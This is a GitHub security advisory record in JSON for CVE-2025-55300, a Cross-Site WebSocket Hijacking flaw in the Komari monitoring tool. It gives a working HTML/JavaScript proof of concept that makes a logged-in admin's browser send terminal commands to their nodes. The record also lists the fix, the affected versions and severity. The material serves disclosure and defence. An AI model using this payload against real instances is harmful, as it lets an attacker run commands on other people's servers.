{"id":"GHSA-q355-h244-969h","summary":"Komari vulnerable to Cross-site WebSocket Hijacking","details":"### Summary\n\nWebSocket upgrader has disabled origin checking, enabling Cross-Site WebSocket Hijacking (CSWSH) attacks against authenticated users\n\n### Details\n\nhttps://github.com/komari-monitor/komari/blob/bd5a6934e1b79a12cf1e6a9bba5372d0e04f3abc/api/terminal.go#L33-L35\n\nAny third party website can send requests to the terminal websocket endpoint with browser's cookies, resulting in remote code execution\n\n### PoC\n\n1. Login in to your komari instance\n2. Hosting the following HTML code on internet, replace `\u003ckomari-addr\u003e` and `\u003ctarget-uuid\u003e` into yours\n3. Visit this HTML page, you can see your node is executing `uptime` without your actions\n\n```\n\u003cpre\u003e\u003c/pre\u003e\n\u003cscript\u003e\nconst socket = new WebSocket(\"wss://\u003ckomari-addr\u003e/api/admin/client/\u003ctarget-uuid\u003e/terminal\");\nsocket.addEventListener(\"open\", (event) =\u003e {\n  const binaryBlob = new Blob(['uptime\\n'], { type: 'application/octet-stream' });\n  socket.send(binaryBlob);\n});\nsocket.addEventListener(\"message\", (event) =\u003e {\n  event.data.text().then(x =\u003e {document.querySelector(\"pre\").append(x)});\n});\n\u003c/script\u003e\n```\n\n### Impact\n\nAn administrator of a Komari instance will execute commands on their nodes unnoticed when visiting a malware page.","aliases":["CVE-2025-55300","GO-2025-3874"],"modified":"2025-08-19T04:59:36.107083Z","published":"2025-08-12T00:13:28Z","database_specific":{"cwe_ids":["CWE-1385"],"severity":"HIGH","github_reviewed":true,"github_reviewed_at":"2025-08-12T00:13:28Z","nvd_published_at":null},"references":[{"type":"WEB","url":"https://github.com/komari-monitor/komari/security/advisories/GHSA-q355-h244-969h"},{"type":"WEB","url":"https://github.com/komari-monitor/komari/commit/53171affcaf050145810efaaef420651a6e630be"},{"type":"PACKAGE","url":"https://github.com/komari-monitor/komari"},{"type":"WEB","url":"https://github.com/komari-monitor/komari/blob/bd5a6934e1b79a12cf1e6a9bba5372d0e04f3abc/api/terminal.go#L33-L35"},{"type":"WEB","url":"https://github.com/komari-monitor/komari/releases/tag/1.0.4-fix2"}],"affected":[{"package":{"name":"github.com/komari-monitor/komari","ecosystem":"Go","purl":"pkg:golang/github.com/komari-monitor/komari"},"ranges":[{"type":"SEMVER","events":[{"introduced":"0"},{"fixed":"0.0.0-20250809073044-53171affcaf0"}]}],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/08/GHSA-q355-h244-969h/GHSA-q355-h244-969h.json"}}],"schema_version":"1.9.0","severity":[{"type":"CVSS_V4","score":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"}]}